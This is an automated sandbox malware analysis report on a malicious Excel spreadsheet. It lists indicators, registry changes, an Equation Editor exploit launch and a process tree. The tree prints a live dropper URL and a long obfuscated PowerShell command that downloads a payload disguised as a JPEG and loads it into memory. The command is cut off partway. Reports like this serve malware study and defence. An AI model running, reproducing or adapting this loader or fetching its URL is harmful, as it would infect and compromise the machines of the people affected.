9b25f1b5b77466f9bd0e8b3f69cf5b5ec10dd5691a59767e5d8ae34f226a4a7f

Analysis

max time kernel
150s
max time network
141s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
06/10/2023, 14:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7030200100.xls
Size

1.0MB
MD5

db838e896fe65e782fde6004f549d93d
SHA1

934e383c200be732053ff5eb47bbd815c3ca2576
SHA256

9b25f1b5b77466f9bd0e8b3f69cf5b5ec10dd5691a59767e5d8ae34f226a4a7f
SHA512

3f27b47b710237ec605d4fa85f2067749e58e86f414cb41457fc4121a81c82905d53fa9575578c60a51099e11412aba918aebd033ae75e137d369a8c2552c332
SSDEEP

24576:PX8DK69PFoheP1QPHwLFRkLFR8/fFX0wv4knkL9kmJZODqcx2X:4L9Nohy1QP4K+4kkLCd

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937

exe.dropper

https://uploaddeimagens.com.br/images/004/616/609/original/rump_vbs.jpg?1695408937

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
9	2024	EQNEDT32.EXE
12	2316	powershell.exe
14	2316	powershell.exe
16	2316	powershell.exe

Abuses OpenXML format to download file from external location

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2024	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2180306848-1874213455-4093218721-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3052	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
268	powershell.exe
2800	powershell.exe
2316	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	268	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	2316	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3052	EXCEL.EXE
3052	EXCEL.EXE
3052	EXCEL.EXE
2324	WINWORD.EXE
2324	WINWORD.EXE

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2024 wrote to memory of 1640	2024	EQNEDT32.EXE	31
PID 2024 wrote to memory of 1640	2024	EQNEDT32.EXE	31
PID 2024 wrote to memory of 1640	2024	EQNEDT32.EXE	31
PID 2024 wrote to memory of 1640	2024	EQNEDT32.EXE	31
PID 1640 wrote to memory of 2800	1640	WScript.exe	32
PID 1640 wrote to memory of 2800	1640	WScript.exe	32
PID 1640 wrote to memory of 2800	1640	WScript.exe	32
PID 1640 wrote to memory of 2800	1640	WScript.exe	32
PID 1640 wrote to memory of 268	1640	WScript.exe	34
PID 1640 wrote to memory of 268	1640	WScript.exe	34
PID 1640 wrote to memory of 268	1640	WScript.exe	34
PID 1640 wrote to memory of 268	1640	WScript.exe	34
PID 2324 wrote to memory of 1056	2324	WINWORD.EXE	36
PID 2324 wrote to memory of 1056	2324	WINWORD.EXE	36
PID 2324 wrote to memory of 1056	2324	WINWORD.EXE	36
PID 2324 wrote to memory of 1056	2324	WINWORD.EXE	36
PID 2800 wrote to memory of 2316	2800	powershell.exe	38
PID 2800 wrote to memory of 2316	2800	powershell.exe	38
PID 2800 wrote to memory of 2316	2800	powershell.exe	38
PID 2800 wrote to memory of 2316	2800	powershell.exe	38

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\7030200100.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3052

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2324
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1056

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2024
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Htmlcent.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1640
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreIDgTreDgTre9DgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre2DgTreDEDgTreNgDgTrevDgTreDYDgTreMDgTreDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrecgB1DgTreG0DgTrecDgTreBfDgTreHYDgTreYgBzDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDYDgTreOQDgTre1DgTreDQDgTreMDgTreDgTre4DgTreDkDgTreMwDgTre3DgTreCcDgTreOwDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTreuDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreKQDgTre7DgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrec